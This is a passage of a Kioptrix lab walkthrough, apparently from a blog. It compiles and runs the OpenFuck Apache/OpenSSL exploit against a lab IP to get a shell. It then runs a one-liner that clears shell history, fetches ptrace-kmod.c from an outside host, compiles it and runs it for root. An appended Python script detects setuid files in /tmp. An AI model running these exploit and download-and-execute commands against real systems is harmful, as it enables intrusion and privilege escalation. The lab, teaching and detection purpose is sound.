794 | MD5_Update(&ctx,&c,1);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
796 | MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
797 | MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
798 | MD5_Final(km,&ctx);
| ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
| ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
807 | RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
| ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
| ^~~~~~~~~~~
47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
811 | RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
| ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
./470 | grep "1.3.20"
Command breakdown: run the 470 binary from the current directory (with no arguments it prints its list of supported targets) and pipe the output through grep to keep only the lines containing "1.3.20". The result lists the apache-1.3.20 builds on different operating systems, each shown as an ID number followed by a description.
┌──(root㉿root)-[~/桌面]
└─# ./470 | grep "1.3.20"
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
Note: RedHat appeared during the nmap information gathering.
Running the exploit to get a shell
./470 0x6b 192.168.159.138 -c 40
Command breakdown: 0x6b is the target ID chosen from the list above (RedHat Linux 7.2, apache-1.3.20-16), 192.168.159.138 is the target IP, and -c 40 corresponds to the "Connection... 40 of 40" shown in the output below.
┌──(root㉿root)-[~/桌面]
└─# ./470 0x6b 192.168.159.138 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
--10:36:50-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
The output above reveals the download URL of the privilege-escalation script.
Download the privilege-escalation script:
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Start a listener on port 80:
sudo python -m http.server 80: serves the script to the target; its request log shows whether the download went through.
Then, in the target shell, fetch it from the attacking machine:
wget http://192.168.159.131:80/ptrace-kmod.c
Then leave the shell with exit.
Reconnect with sudo ./470 0x6b 192.168.159.138 -c 40.
┌──(root㉿root)-[~/桌面]
└─# sudo ./470 0x6b 192.168.159.138 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
--11:32:12-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c.1'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: file path prefix `/usr/bin' never used
[+] Attached to 6757
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
ls
exploit
ls -l
total 21
-rwsr-sr-x 1 root root 19920 Dec 8 11:32 exploit
Finally, ls -l confirms root privileges; privilege escalation is complete.
Tags: Kioptrix, http, Level, OpenSSL, 192.168, ssl, walkthrough, Apache, MD5 From: https://blog.csdn.net/m0_73863011/article/details/144279346
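As an added example from the defender's side (not part of the original post), the artefact this walkthrough ends with, a setuid/setgid root binary in /tmp, is exactly what a periodic host check should catch. The script reviews `ls -l` output (the constructed sample reproduces the listing above) and walks the world-writable directories of a live host for files carrying setuid/setgid bits; the directory list and sample are assumptions.

```python
"""Added example (not from the original post): a defender-side check for the
artefact the walkthrough ends with, a setuid root binary dropped in /tmp.
`flag_ls_lines` reviews `ls -l` output (the constructed sample below mirrors
the post's final listing); `find_setid_files` walks the world-writable
directories on a live host and reports files carrying setuid/setgid bits."""
import os
import re
import stat

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")      # assumed default scan set
MODE_RE = re.compile(r"^[-bcdlps][rwxsStT-]{9}$")

LS_OUTPUT = """total 21
-rwsr-sr-x 1 root root 19920 Dec 8 11:32 exploit
-rw-r--r-- 1 apache apache 3122 Dec 8 11:30 ptrace-kmod.c
"""

def flag_ls_lines(text):
    """Return the entries in `ls -l` output whose mode string carries setuid
    (s/S in the owner execute slot) or setgid (s/S in the group execute slot)."""
    flagged = []
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9 or not MODE_RE.match(parts[0]):
            continue                     # "total N" line or not a listing entry
        mode, owner, name = parts[0], parts[2], parts[8]
        setuid, setgid = mode[3] in "sS", mode[6] in "sS"
        if setuid or setgid:
            flagged.append({"name": name, "owner": owner, "setuid": setuid, "setgid": setgid})
    return flagged

def find_setid_files(dirs=WORLD_WRITABLE):
    """Walk the given directories and return regular files with a setuid/setgid
    bit, with owner uid/gid so root-owned ones can be prioritised."""
    hits = []
    for top in dirs:
        for root, _subdirs, files in os.walk(top, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)      # lstat: do not follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                setuid = bool(st.st_mode & stat.S_ISUID)
                setgid = bool(st.st_mode & stat.S_ISGID)
                if setuid or setgid:
                    hits.append({"path": path, "uid": st.st_uid, "gid": st.st_gid,
                                 "mode": stat.filemode(st.st_mode),
                                 "setuid": setuid, "setgid": setgid})
    return hits

def root_setuid(hits):
    """Subset of hits that would run as root: setuid bit and owner uid 0."""
    return [h for h in hits if h["setuid"] and h["uid"] == 0]

if __name__ == "__main__":
    for h in flag_ls_lines(LS_OUTPUT):
        print("ls review:", h)
    for h in root_setuid(find_setid_files()):
        print("live host:", h["mode"], h["path"])
```

On a real host the `find_setid_files` result should be compared against a known baseline, since legitimate setuid binaries live under /usr, not in temporary directories.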